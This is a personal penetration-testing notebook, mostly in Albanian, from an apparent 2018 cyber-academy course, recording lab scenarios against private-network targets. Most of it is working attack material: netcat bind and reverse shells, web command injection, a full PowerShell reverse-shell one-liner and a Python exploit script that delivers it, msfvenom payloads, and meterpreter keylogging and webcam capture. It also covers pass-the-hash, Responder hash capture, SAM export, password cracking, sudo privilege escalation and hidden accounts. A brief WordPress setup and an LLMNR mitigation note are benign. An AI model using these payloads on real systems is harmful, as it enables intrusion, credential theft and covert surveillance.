###INTERRUPT IN BOOT###
Kur t'bohet load Grub Screen, e shtypim E
mount -o remount,rw /
.##################################################################################
###HAP BACKDOOR####
ne host A e hap nje port
#nc -lvp 667 -e /bin/bash
nga host B lidhet ne host A
#nc 192.168.0.110 667
.##################################################################################
###SKENAR### ### DIRB & CURL ###
172.16.60.59 ##Target IP
nje Ip me hack, enumeration, to get access, verify
-e gjen linkun problematik me dirb ( directory browse)
-e bon run skipten ne file e dyshimt per ta hap session
root@CyberACAD:/home/dardan# curl http://172.16.60.59/index.php\?cmd\=nc+-lvp+31337+-e+/bin/bash
-per tju qas sessionit te hapur me lart
dardan@CyberACAD:~$ nc 172.16.60.59 31337
echo 'index.php' | base64 ## encode
echo 'aW5kZXgucGhwCg==' | base64 -d ## decode
.##################################################################################
###SKENAR###WORDPRESS###
merr nje file
#wget http://wordpress.org/latest.zip
#wget http://wordpress.org/latest.tar.gz
unzip
#unzip latest.zip
#tar -zxvf latest.tar.gz
#delete latest.zip
#rm -rf latest.zip
barte file to var/www/html nese e ke shakrku duku tjeter
#mv wordpress var/www/html
barti krejt nga wordpress folderi nje hap mbrapa
#mv * ../
Access mysql
#mysql -u root -p
#create db
#create database dr;
edit sample file
#vi wp-config-sample.php
#edit
#database name / user / password
replace modified file
#mv wp-config-sample.php wp-config.php
ne browser krijo account ne WP
#http://IP ose name i appache service
krijo user ne web form
###Script me kriju e cila e shkarkon wordpress edhe i exekution krejt hapat si ne ushtrime###
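#! /bin/bash
# Automates the manual WordPress steps above: fetch the latest release into
# the web root, unpack it in place and create the database.
#
# Must run as a user that can write to /var/www/html. The MySQL root password
# is prompted for by the client (-p with no value) instead of being written
# into the command line, where it would be visible in `ps` output and in the
# shell history.
set -euo pipefail

readonly web_root=/var/www/html

cd "$web_root" || exit 1
# The archive is code this server will execute: fetch it over TLS so the
# download's integrity does not depend on the network path to wordpress.org.
wget https://wordpress.org/latest.zip
unzip latest.zip
# Lift the tree one level up so the site is served from the web root itself.
mv wordpress/* "$web_root"/
rm -rf -- latest.zip wordpress
cp wp-config-sample.php wp-config.php
# Database for wp-config.php (set DB_NAME / DB_USER / DB_PASSWORD there afterwards).
mysql -u root -p -e "create database xxDB;"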
Ose
mysql --host=localhost --user=root -pPassword
CREATE DATABASE xxDB;
SHOW databases;
chmod a+x wp-auto ## e bon executable
bash wp-auto ## ose e bon run si script
link
http://www.codingpedia.org/ama/how-to-create-a-mysql-database-from-command-line/
.##################################################################################
###SKENAR###Me kriju qasje ne SSH pa u athentiku###
krijo file ~/.ssh
un-auth access client to server
mkdir .ssh/ ##create .ssh if it does not exist yet
server@CyberACAD:~/.ssh$ ssh-keygen ## generate keys
scp id_rsa.pub client@172.16.60.47:/home/client/.ssh/
client@xx:~/home/client/.ssh$ mv id_rsa.pub authorized_keys
ssh server@172.16.60.47 ## try to access client to server
:)
#ne Server
ssh-keygen
touch authorized_keys
cat id_rsa.pub > authorized_keys
.##################################################################################
###backdoor, remote code execution, intro###
curl https://google.com ##Lexon kontentin
curl https://google.com/x.php?cmd\=cat+/passwd
cmd\=cat+/passwd
cmd\=cat+/
curl http://172.16.60.59/run.php\?cmd\=nc+-lvp+31337+-e+/bin/bash
.##################################################################################
###SKENAR###me marr qasje prej mysql ne shell access###
\! nc -lvp 8888 -e /bin/bash
\! id
nc ip 8888
ls
id
dw wp
unzip
cmv wp content to /html
mysql -u root -p
create database xx;
edito wp-config.php db name, user, password
brows IP/wp-config.php
create user/password
install wordpress
cd user/share/webshell
create a file with code run.php upload on /html
curl http://ip/run.php\?cmd\=nc+-lvp+1337+-e+bin/bash
nc ip 1337
id
ls
cat wp-config.php
python-c 'import pty; pty.spawn("/bin/bash")'
mysql -u$root -p$xxxx -e "\! id"
"os python libraria" ta jep mundesi me execute comanda te systemit
mysql -H ip ## te qon remote
.##################################################################################
###SKENAR###Challenge###
1.Keni me startu nje web apache server, me gjeneru log-sa, me gjeneru spaku 100 lines of code, keni me ndertu nje automated script me kete logjike, ku IP unike i merr dhe i kthen ne base64, dhe i ke echo vetem vlerat e base64. Pra me lexu log-un, access.log edhe me i nxjerr IP me i sortu unike dhe me i kthye vetem vlerat e tyre base64, e jo ne plain text.
Startim i web apache server te gjenerimi i logsave logs of code gjenerete script ku me i nxjerr ip dhe me i kthy ip ne base 64
Zgjidhja:
#!/bin/bash
cat /var/log/apache2/access.log | grep "172.16" | cut -d " " -f 1 | sort -u > ips.txt
for i in $(cat ips.txt); do echo $i| base64; done
2.Research qysh me shtu user pa kriju home directory- kur shkon ne Ls /home/ mos me ekzistu, basically i bjen user i fshehte
Dhe ne Ssh me u kyc me kete user qe kemi krijuar pa home directory
3. Heqeni hash-in, shtoni hash-in e juaj, kycuni me passwordin e hash-it juaj, kryeni pune dhe pasi te kryeni pune ktheni hash-in qe ishte fillimisht.
Eshte nje password “ubuntu” ky password e ka nje hash, ky hash nuk mundet kurre me u kthy ne “ubuntu”, gjithmone eshte ky hash value, ky hash eshte i ruajtur ne /etc/shadow, ne nuk e dijme qe ky hash e ka plain text “ubuntu”, per kete arsye duhet me e heq kete hash dhe me shtu nje hash te ri, ku ne e dijme passwordin. Psh password e kthejme ne hash, dhe kete hash e ruajme atje ku duam ta nderrojme hashin. Pastaj mund te bejme login si password, kryjme pune dhe pastaj e kthejme hashin “ubuntu”.
Ekziston hash-i sha512 (hash i pakthyeshem, jo enkriptim) ne /etc/shadow
E kemi harru pass po dojme me bo access ne kete file qysh me e nderru hash qe me e nderru pass me e kry punen dhe me e kthye hashin e vjeter
Sudo cat /etc/shadow
Te zgjidhura nga Arbeni:
Krijimi i nje useri qe nuk ka /home directory:
https://asciinema.org/a/To1xwcgCmjb06umuOUGIAO2vF
komanda "--no-create-home" e krijon nje user pa home directory, por kur mundohemi me ju qas me ssh apo protokol tjeter nuk mundemi, sepse nese e lexojme fajllin /etc/passwd e shohim qe ai user nuk ka "entry point", dmth nuk ka shell /bin/bash
komanda "--no-create-home --shell /bin/bash" e ben te kunderten e komandes me lart
Shtimi apo ndrrimi i passwordit te nje useri duke modifikuar fajllin /etc/shadow
Ekzistojn disa metoda, 4 nder to jane:
https://asciinema.org/a/zk6zChlDAhR9fIrXMz5bVPckV | chpasswd
https://asciinema.org/a/hKSm9dZCY2pOqLWhAC2nr59Db | openssl
https://asciinema.org/a/PKUxOrkmvLJyuk0DlISJc8Xpb | perl
https://asciinema.org/a/y0mzjwp4YsoRTE17GGxwTIEcX | python
----------------------------------------------------------------------------
python -c 'import crypt; print crypt.crypt("arben123", "$6$SalTTeSt$")'
perl -e 'print crypt("arben123","\$6\$saltsalt\$") . "\n"'
openssl passwd -1 -salt CyBeR arben2
echo "username:password" | chpasswd
.##################################################################################
###SKENAR###Challenge##
1. Me gjet nje file qe permban keys per nje protokoll te caktuar,
2. Me u lidh me nje user te caktuar duke perdorur nje komand qe te len me percaktu keyn
3. Me ekzekutu komanda te sudo dhe me lexu nje fajll ne folderin /root
Me gjet nje file qe permban keys per nje protokoll te caktuar, e perdor per me u lidh me nje protokoll qe eshte i sigurt, useri nuk eshte sudo por lejohet te exe ca komanda si sudo
Hint:
172.16.60.81
Cmd =cd+/root
base64
Ls –al
Ssh –i fajlli IP
Sudo /bin/cat
.##################################################################################
###SKENAR##Export SAM and system file###
reg save hklm\sam c:\sam
reg save hklm\system c:\system
##tool per mi hap sma and system files
pwdump system sam (run in folder where sam and system file are located)
.##################################################################################
###SKENAR###Responder & John & PASS the HASH###
RESPONDER
#cd /usr/share/responder/
#python Responder.py -i 192.168.1.50 -I eth0
Simulate a user typing the wrong SMB server name using SNARE01 instead of SHARE01
Error is returned to the client machine from Responder.py that windows can not access it.
#cd logs/ ls (to comfirm if hash log file is created
JOHN
#john SMBv2-NTLMv2-SSP-192.168.1.8.txt
John hash2.txt - -wordlist=/root/Desktop/rockyou.txt
John - -show hash2.txt
John - -show =hash2.txt
Cat john.pot
john hh.txt - -wordlist=/root/Desktop/rockyou.txt
john hh.txt - -show
cd
~/.john
Cd ~
Cd .john
PASS the HASH
Cd pth-toolkit-master/
./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 cmd
./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 ‘net user a a /add’
pth-winexe -U Workgroup/Administrator%5274a8ac31638590:B206D78784758497FE2540F99BDF7BF0 //192.168.1.8 cmd
xfreerdp /u:administrator /d:Workgroup /pth:B206D78784758497FE2540F99BDF7BF0 /v:192.168.1.8
*How to Secure Networks against LLMNR / NBT-NS Poisoning Attacks*
The good news is that this attack is fairly easy to prevent. Note that both LLMNR and the NetBIOS Name Service (NBT-NS) need to be disabled — LLMNR through Group Policy ("Turn off multicast name resolution") and NBT-NS in each adapter's TCP/IP WINS settings; if you only disable LLMNR, Windows will fail over to NBT-NS for resolution.
.##################################################################################
###SKENAR###Challenge###16.05.2018
target 172.16.60.85 Ubuntu-10ubuntu0.1
PORT STATE SERVICE
80/tcp open http
1
# dirb http://172.16.60.85
http://172.16.60.85/id_rsa
2
# wget http://172.16.60.85/id_rsa
# chmod 400 id_rsa
# ssh -i id_rsa cyberacademy@172.16.60.85
merr qasje $
3
$ ps -aux ## per ta par executable file
$ locate xxxx.py ##per ta gjetur lokacionin
$ cd /usr/bin
$ python2.7 Administrator_Password.py ## ky tregon te dhenat e next target
The next target was a Windows machine; its credentials were given in that file.
4
- me te dhenat e gjetura qasesh RDP ne target PC
- metod tjeter nga nje linux OS
# rdesktop -u Administrator 172.16.65.92
-kliko easy access (do te hapet cmd nese eshte ndrequr mepare)
me gjet hiden file me info te next target
5
ne next target machine
$ sudo -l ##tregon comands qe munet mi bo run si user
$ sudo python -c 'import pty;pty.spawn("/bin/bash");'
# :)
.##################################################################################
###SKENAR###Challenge###18.05.2018
Target 172.16.60.92
Basic Linux Commands
https://www.youtube.com/watch?v=tgcxc1xg87Y
rdesktop (ip) -r disk:share=/home/bayo/store
172.16.60.92
3389
22
445
Linux:
# rdesktop 172.16.65.120 –r disk:share=/usr/share/windows-binaries
Windows:
> nc.exe -lvp 777 -e cmd.exe
Linux: nc 172.16.60.67 777
.##################################################################################
###SKENAR###msfvenom & msfconsole###
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -f exe -o foto.exe
mv foto.exe tmp/
python -m SimpleHTTPServer 80
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > show options
msf exploit(multi/handler) >set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > set lhost 172.16.60.68
msf exploit(multi/handler) > set lport 4477
msf exploit(multi/handler) > exploit
pret deri sa te executon dikush malware, ne kete rast te hostuar ne http
pasi te executohet malware vjen sessioni
sessions
sessions -i 5 --numrin e sesionit
##################################################################################
###SKENAR###Challenge###21.05.2018
ident. alive hosts
seq 1 254
for i in $(seq 1 254); do ping -c 1 '172.16.60.'$i;done
cat output.txt | grep 'bytes of data' | cut -d ' ' -f 2
nmap 172.16.60.0/24 ###1 check alived host, check top 1025 well known ports
nmap -sn 172.16.60.1/24 --sn e kontrollon veq a eshte hap
nmap 172.16.60.1/24 -p- -- -p- check all range ports
nmap -sS -sV 172.16.1.172 -- -p5988 ### check specific port
attempts on open ports found via nmap
ftp
try anonymous/anonymous
ftp 172.16.1.19
telnet 172.16.1.19 21
telnet 172.16.1.19
pasi ke marr access ne shell
ssh -R cyberacademy2018:80:localhost:80 serveo.net
rtsp 554 /me vlc
ne vlc network url: rtsp:172.16.1.19:554
snmp
sudo msfconsole
auxiliary
set community filename
exploit
search ms17-010
windows
# searchsploit "windows server 2008"
# locate windows/remote/41987.py
./pth-winexe -U WOURKGROUP/user%hash //172.16.1.204 cmd ### pass the hash
----------------------------------------------------------------------------
library hijack
# Lab target for the "library hijack" exercise: a ping wrapper that hands
# user input to the shell. The transcript is garbled (no indentation, broken
# print/else lines), so only comments are added here.
import os
import sys
# Bare-name import of a module that is not in the standard library: it is
# resolved through sys.path, which for a script starts with the script's own
# directory. That directory and the module file should be owned by, and
# writable only by, the account running the script — whatever is found there
# runs at import time.
import random_useragent
while True:
# raw_input -> Python 2; the returned string is untrusted input.
ping = raw_input ("input: ")
# Denylist of two shell operators. A denylist cannot cover every shell
# metacharacter; the robust fix is an allowlist (validate the value as a
# hostname or IP) and running ping via subprocess with an argument list,
# so no shell parses the input at all.
if '&&' in ping:
print ;hacker....:
sys.exit()
elif '|' in ping:
print ;hacker....:
else
# Untrusted input interpolated into a shell command string: command
# injection sink.
os.system('ping {}'.format(ping))
python_py aa_py
input: import os;os.system('net user a a /add')
.##################################################################################
###SKENAR###SSHUTTLE###23.05.2018
ssh uttle
Transparent proxy server that works as a poor man's VPN. Forwards over ssh.
Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
sshuttle -r turbo@172.16.65.117
ssh -R cyberacademy2018:80:localhost:80 serveo.net
http://cyberacademy.serveo.net/
google.com | ifconfig
google.com| nc -lvp 5555 -e /bin/bash
google.com && ls
172.16.65.117 (linux)
nc 172.16.65.117 5555
te ky target me ps -aux ( e sheh nje process turbo_is_turbo)
cat /etc/passwd ( per me verifiku user turbo)
putty 172.16.65.117 turbo/turbo
sudo -l (eshte gjet find qe ka root privilegje)
sudo find /etc/passwd -exec /bin/sh \;
sudo find /etc/passwd -exec nc -lvp 7878 /bin/sh \;
id
nc 172.16.65.117 7878
id
cat info.txt (target 172.16.65.120)
rdesktop 172.16.65.120
5 time shift cmd
ipconfig ( e sheh qe host eshte i lidhun edhe me nje rrjete tjeter)
arp -a (e sheh qe 10.0.1.4 ka komuniku me local host 10.0.1.3)
scanon portet me nc ose nmpa ( gjinden 21, 22, 80)
ne http te 10.0.1.4 browser tregon nje user edhe password
sudo python -c 'import pty;pty.spawn("/bin/bash");'
.##################################################################################
###SKENAR###Challenge PowerSHELL###25.05.2018
power shell
cat oneliner.tcp
ip: 172.16.60.54
nmap -sV 172.16.60.54
80 - eshte gjet hap
ne local machine
nc -lnvp 5588
permes web app ne target IP e run kete shell cmd
google.com|powershell -command "$client = New-Object System.Net.Sockets.TCPClient('172.16.60.108',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
kjo na jep qasje ne shell te target
kalo ne desktop te userit
C:\users\arben\Desktop>
Get-item -Path C:\Users\arben\Desktop\root.txt -stream *
Get-Content -Path C:\Users\arben\Desktop\root.txt -stream target.txt
cyber@172.16.60.65
pass: 123Arben123
me te dhenat e gjetura hym me ssh
ssh cyber@172.16.60.65
pass: 123Arben123
$
$ sudo -l
eshte gjet
/bin/dash /home/cyber/root_me
$ cat /home/cyber/root_me
shihet permbajtja e scriptes
#!/bin/dash
sudo /bin/dash /home/cyber/root_me
# :) root
-----------------------------------------------------------------------------
nano exploit.py
import os
import sys
import requests
ip = sys.argv[1]
port = sys.argv[2]
r = requests.get("http://172.16.60.54/system.php?ping=google.com+%26%26+powershell+-command+%22%24client+%3D+New-Object+System.Net.Sockets.TCPClient%28%27{}%27%2C{}%29%3B%24stream+%3D+%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes+%3D+0..65535%7C%25%7B0%7D%3Bwhile%28%28%24i+%3D+%24stream.Read%28%24bytes%2C+0%2C+%24bytes.Length%29%29+-ne+0%29%7B%3B%24data+%3D+%28New-Object+-TypeName+System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C+%24i%29%3B%24sendback+%3D+%28iex+%24data+2%3E%261+%7C+Out-String+%29%3B%24sendback2++%3D+%24sendback+%2B+%27PS+%27+%2B+%28pwd%29.Path+%2B+%27%3E+%27%3B%24sendbyte+%3D+%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22".format(str(ip), port))
python exploit.py IP with listen port open + port
python exploit.py 172.16.60.68 4433
.##################################################################################
###SKENAR###msfvenom###
msfvenom -p windows/meterpreter/bind_tcp LPORT=4477 -f exe -o BIND_TCP.exe
msfconsole
> use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
set lport 4477
set rhost 172.16.60.76
.##################################################################################
###SKENAR###msfvenom###
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -e elf -o reverse_tcp.elf
msfconsole
> use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
> set lhost 172.16.60.68
> set lport 5560
chmod a+x reverse_tcp.elf
hendler = pret ose servon
.##################################################################################
###SKENAR### Challenge###30.05.2018
=====================
Target: 172.16.65.97
windows/smb/ms08_067_netapi
windows/smb/psexec
run post/windows/manage/enable_dp
run post/windows/gather/
sysinfo
netstat -a
meterpreter >
shell
ipconfig, cd c:, reg same hkml\sam dhe system, net user, net localgroup administrators user /add
net user test ters
net localgroup administrators test /add
net user test /active:yes
net user Administrator
background
getsystem
getuid
getpid
ps --
pkill 2420
migrate 1756 ##kalon ne procese
keyscan_start
webcam xx ##snapshot me marr
webcam_stream
record_mic -d 10
mdf exploit(windows/smb/psexec) >
> session 2xtab
> session -i 2
msf exploit(windows/
.##################################################################################
###SKENAR###msfconsole### 01.06.2018
target: 172.16.60.96
metoda: buffer overflow, banner grabbing, metasploit, search the vulnerabilities, exploitation
nmap 172.16.60.96
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
nmap -sV --script=banner 172.16.60.96
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.7
80/tcp open http BadBlue httpd 2.7
Service Info: Host: IEWIN7; OS: Windows; CPE: cpe:/o:microsoft:windows
msf > search badblue
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/http/badblue_ext_overflow 2003-04-20 great BadBlue 2.5 EXT.dll Buffer Overflow
exploit/windows/http/badblue_passthru 2007-12-10 great BadBlue 2.72b PassThru Buffer Overflow
###merr sessionin e pare
msf > use exploit/windows/http/badblue_passthru
msf exploit(badblue_passthru) > show options
msf exploit(badblue_passthru) > set RHOST 172.16.60.96
msf exploit(badblue_passthru) > set TARGET 1
msf exploit(badblue_passthru) > exploit
meterpreter > sysinfo
###e perdor sessionin e krijuar me pare
use exploit/windows/local/bypassuac_injection
msf exploit(bypassuac_injection) > show options
msf exploit(bypassuac_injection) > set session3 1
msf exploit(bypassuac_injection) > exploit
meterpreter > getuid
meterpreter > getsystem
meterpreter > getuid
msf > use post/windows/gatherc3/credentials/sso
msf post(sso) > show options
msf post(sso) > set session 2
msf post(sso) > exploit
[*] Running module against IEWIN7
Windows SSO Credentials
=======================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;72208 NTLM IEWIN7 IEUser Passw0rd!
0;72208 NTLM IEWIN7 IEUser
0;72286 NTLM IEWIN7 IEUser Passw0rd!
0;72286 NTLM IEWIN7 IEUser
0;83203 NTLM IEWIN7 sshd_server D@rj33l1ng
0;83203 NTLM IEWIN7 sshd_server
[*] Post module execution completed
.##################################################################################
###SKENAR###nmap, hydra ose meduza###01.06.2018
root@kali:/# nmap -sV --script=banner 172.16.60.76
Nmap scan report for 172.16.60.76
Host is up (0.0066s latency).
Not shown: 986 closed ports
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Service
Service Info: Host: ARBEN-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
brootforce RDP me hydra ose meduza tu e perdor rockyou.txt
.##################################################################################
###SKENAR###msfvenom & msfconsole###
##Challenge##04.06.2018
TARGET: 172.16.60.91
msfvenom -p python/meterpreter/reverse_tcp lhost=172.16.60.x lport=9999 -f raw >shell.py
msfconsole -q
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
show options
set lhost 172.16.60.78
set lport 9999
exploit -j
cat shell.py
copy content of shell.py
paste ne python interpreter on web
pret sessionin
sessions
sessions -i 1
getuid
shell
bash
python -c 'import pty; pty.spawn(/bin/bash")'
ls
debugger.sh
cat debugger.sh
...
.##################################################################################
###SKENAR### version of ftp running on target
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(ftp_version) > set RPORT 21
RPORT => 21
msf auxiliary(ftp_version) > exploit
[*] 127.0.0.1:21 - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) >
.##################################################################################
###BANNER GRABBING
nmap -sS -p 80 -A 192.168.0.1
